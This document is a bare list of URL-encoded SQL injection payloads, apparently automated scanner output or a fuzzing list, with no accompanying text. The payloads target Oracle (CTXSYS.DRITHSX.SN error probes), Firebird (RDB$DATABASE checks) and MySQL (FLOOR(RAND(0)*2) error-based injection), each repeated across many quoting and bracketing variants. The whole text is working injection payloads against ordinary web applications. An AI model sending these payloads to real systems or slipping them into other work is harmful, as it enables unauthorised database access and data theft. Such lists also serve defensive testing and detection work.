1234.5%22%20WHERE%205209%3D5209%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1234.5%20WHERE%202502%3D2502%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27pRSa%27%20FROM%20DUAL%20WHERE%209532%3D9532%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27WmNM%27%20WHERE%207527%3D7527%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20gZKz%20WHERE%202570%3D2570%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27wHEm%27%20WHERE%202873%3D2873%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%201387%3DCTXSYS.DRITHSX.SN%281387%2C%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281387%3D1387%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20%23 1234.5%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29 1234.5%27%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29 1234.5%27%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29 1234.5%22%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29 1234.5%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%281184%3D1184 1234.5%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%289452%3D9452 1234.5%29%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%284595%3D4595 1234.5%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29 1234.5%27%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%27zGwT%27%3D%27zGwT 1234.5%27%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%27IVEf%27%3D%27IVEf 1234.5%27%29%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%28%27gXvc%27%3D%27gXvc 1234.5%27%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%27zqgY%27%3D%27zqgY 1234.5%27%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%27PDxs%27%20LIKE%20%27PDxs 1234.5%27%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%27puRj%27%20LIKE%20%27puRj 1234.5%27%29%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%28%27rgcm%27%20LIKE%20%27rgcm 1234.5%27%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%27glZJ%27%20LIKE%20%27glZJ 1234.5%22%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%22oHkb%22%3D%22oHkb 1234.5%22%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%22IhYI%22%3D%22IhYI 1234.5%22%29%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%28%22lEaZ%22%3D%22lEaZ 1234.5%22%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%22MvXA%22%3D%22MvXA 1234.5%22%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%22VHPH%22%20LIKE%20%22VHPH 1234.5%22%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%22YrLi%22%20LIKE%20%22YrLi 1234.5%22%29%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%28%22qreg%22%20LIKE%20%22qreg 1234.5%22%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%22ceCh%22%20LIKE%20%22ceCh 1234.5%25%27%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%28%27KPMX%27%3D%27KPMX 1234.5%00%27%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20AND%20%27Unse%27%3D%27Unse 1234.5%27%29%20WHERE%204822%3D4822%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 1234.5%22%29%20WHERE%204390%3D4390%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 1234.5%29%20WHERE%202735%3D2735%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 1234.5%27%20WHERE%208118%3D8118%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 1234.5%22%20WHERE%204249%3D4249%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 1234.5%20WHERE%204447%3D4447%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27DBYm%27%20FROM%20DUAL%20WHERE%201084%3D1084%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27FMTU%27%20WHERE%201531%3D1531%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20eOwS%20WHERE%208333%3D8333%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27RvZC%27%20WHERE%203156%3D3156%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%201604%3D%28%27%3Amvk%3A%27%7C%7C%28SELECT%20CASE%201604%20WHEN%201604%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Apwy%3A%27%29%20%23 -7510%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -2137%27%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -1451%27%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -9426%22%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -7677%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%289536%3D9536 -2468%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%288926%3D8926 -5559%29%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%289015%3D9015 -1009%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -1619%27%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27tPpw%27%3D%27tPpw -9031%27%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27EVGK%27%3D%27EVGK -1728%27%29%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27YjWU%27%3D%27YjWU -3954%27%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Ngog%27%3D%27Ngog -5603%27%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27XFnX%27%20LIKE%20%27XFnX -6971%27%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27tyKa%27%20LIKE%20%27tyKa -5913%27%29%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27kLpl%27%20LIKE%20%27kLpl -9801%27%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27DNxR%27%20LIKE%20%27DNxR -2990%22%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22BYLF%22%3D%22BYLF -7945%22%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22hyDv%22%3D%22hyDv -9450%22%29%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22qBvj%22%3D%22qBvj -9346%22%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22MWRv%22%3D%22MWRv -3274%22%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22cdjR%22%20LIKE%20%22cdjR -3636%22%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22RZWy%22%20LIKE%20%22RZWy -7551%22%29%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22bGNA%22%20LIKE%20%22bGNA -9234%22%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22agIS%22%20LIKE%20%22agIS -9267%25%27%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27%25%27%3D%27 -1669%25%27%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27%25%27%3D%27 -2652%25%27%29%29%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27%25%27%3D%27 -6608%25%27%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27 -2465%00%27%29%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27nNsv%27%3D%27nNsv -9998%00%27%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Uluu%27%3D%27Uluu 